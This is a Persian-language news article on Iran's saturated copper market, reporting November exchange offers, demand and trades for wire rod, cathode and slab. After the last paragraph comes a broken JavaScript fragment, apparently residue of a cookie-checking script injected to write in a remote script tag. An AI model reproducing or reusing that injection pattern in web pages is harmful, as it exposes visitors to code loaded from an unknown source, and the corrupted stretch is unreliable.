سه شنبه ۰۱ مرداد ۱۳۹۸ , ۰۴:۳۱:۵۴
2019 / July / 23گروه صنایع معدنی، سایر حوزه‌های صنایع معدنی آذر ۱۰, ۱۳۹۷

۹هزار تن معامله در یک ماه

کاهش معاملات به دلیل اشباع بازار مس

بازار مس دنیا پس از کاهش یک هزار دلاری قیمت این فلز در اواخر بهار و اوایل تابستان، به یک آرامش نسبی رسیده‌است و نوسان خاصی ندارد. مس مدت هاست که قیمتی در حدود 6 هزار و 200 دلار بر تن دارد و تنها روی آن نوسان می کند. هر چند که جنگ تجاری و نوسان شاخص ارزش دلار هر از چند گاهی روی قیمت مس و همه فلزات اساسی اثر می گذارد و باعث کاهش و افزایش قیمت مس می شود.

۲٫۰
۰۱

به گزارش پیام‌آوران معدن و فولاد، پس از هیجان و هیاهوهای بسیار مس در بازار داخلی طی چند ماه ابتدایی سال ناشی از قیمت گذاری دستوری با نرخ دولتی، اکنون مس در بورس کالا با نرخ ارز در سامانه نیما قیمت گذاری می شود. هر چند که مدتی نیز مس بدون سقف رقابت و با نرخ دولتی در بورس مورد معامله قرار می گرفت. اما در همان زمان قیمت مس حتی به ۶۵ هزار تومان برای هر کیلوگرم نیز رسید. در آن زمان هیجان بسیاری برای خرید مس وجود داشت. اکنون که با گذشت ۸ ماه از سال معاملات بسیاری در مورد مس انجام شده، به نظر می رسد که بازار مس تا حد زیادی اشباع شده باشد و خریداران از این بازار عقب نشینی کرده اند؛ زیرا هر هفته محصولات مسی فراوانی به صورت مازاد روی دست تولیدکنندگان باقی می ماند.

 

طی آبان ماه سال جاری با وجود عرضه ۳۳ هزار تنی مس در بورس کالا، تنها ۱۴ هزار تن تقاضا ثبت شد و در این میان تنها ۹ هزار تن از این محصولات مورد معامله قرار گرفته و به فروش رفتند. نکته قابل توجه در مورد معاملات مس آن است که با وجود هیجانات بسیار زیاد بازار برای دریافت مفتول و تقاضای بسیار شدید، در آبان ماه افت وحشتناکی برای تقاضا و معاملات مفتول رخ داد؛ زیرا با وجود عرضه ۱۵ هزار و ۷۰۰ تن مفتول در بورس، تنها ۲ هزار تن تقاضا وجود داشت و یک هزار و ۹۰۰ تن از این محصول مورد معامله قرار گرفت.

 

نکته مهم در بازار مفتول نیز آن است که اخیرا ۲ شرکت دنیای مس کاشان و گیل راد شمال به عنوان عرضه کنندگان اصلی مفتول که پیش از این به میزان ۱۰۰ تا ۲۰۰ تن عرضه می کردند، عرضه های خود را افزایش دادند و به یک هزار تن رساندند، اما در مقابل رغبتی برای خرید مشاهده نشد. کاتد نیز مورد استقبال چندانی از سوی خریداران قرار نگرفت؛ زیرا با وجود عرضه ۱۷ هزار و ۳۰۰ تنی مس در بورس کالا، ۱۲ هزار و ۲۰۰ تن تقاضا برای آن وجود داشت و در این میان تنها ۷ هزار و ۷۰۰ تن کاتد مورد معامله قرار گرفت. ضمن اینکه پس از چندین سال شاهد عرضه اسلب مس از سوی شرکت ملی صنایع مس ایران به میزان ۱۲۰ تن بودیم که بدون متقاضی و معامله، رینگ بورس را ترک کرد. +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

2.0
01

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.